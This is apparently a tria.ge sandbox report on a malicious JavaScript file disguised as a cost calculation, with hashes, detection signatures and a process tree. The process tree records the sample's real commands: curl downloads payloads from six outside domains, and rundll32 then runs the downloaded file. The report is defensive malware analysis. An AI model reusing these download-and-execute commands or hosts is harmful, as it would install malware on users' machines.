Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    27s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-de
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-de, locale:de-de, os:windows7-x64, system, windows
  • submitted
    07/06/2023, 18:07

General

  • Target

    Calculation-of-costs-874028386.js

  • Size

    149KB

  • MD5

    fb5b4219a7a47effe058b4a5e7e48a6c

  • SHA1

    421dd44ba85cb8278b7326b2c35d1078a375f79b

  • SHA256

    5b2290e985718dcb2b9ed3a4ea6f4982c9db96a9ac7d20e7ee8d11f4d1e0a94a

  • SHA512

    890e04f3efab155556b1dbe996d79687e64904881741e52707188c5bf513997fae904765b047c0e54e5c7774d12fab8cf9a0e73434f928ac9333ae585483974d

  • SSDEEP

    3072:gRzeIwVOOpMRgFAzMeTluFzdYfoJ+v9oh:B6Op/FanTluFzdYf7Sh

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe (1 IoCs)
  • Suspicious use of WriteProcessMemory (27 IoCs)

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Calculation-of-costs-874028386.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://skagnechri.com/0.34899733014845713.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:1816
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://maicobbbi.com/0.6013654457759208.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:500
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://yerkaija.com/0.03298715274427777.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:828
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://glovitol.com/0.9651502297082507.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:1616
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://vitcaka.com/0.7000805230969773.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:1724
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://lauconisc.com/0.9380485461932972.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
      2⤵
      PID:1872
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:592
      • C:\Windows\system32\timeout.exe
        timeout 10
        3⤵
        • Delays execution with timeout.exe
        PID:1180
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
        3⤵
        PID:2004

Network

MITRE ATT&CK Enterprise v6


Downloads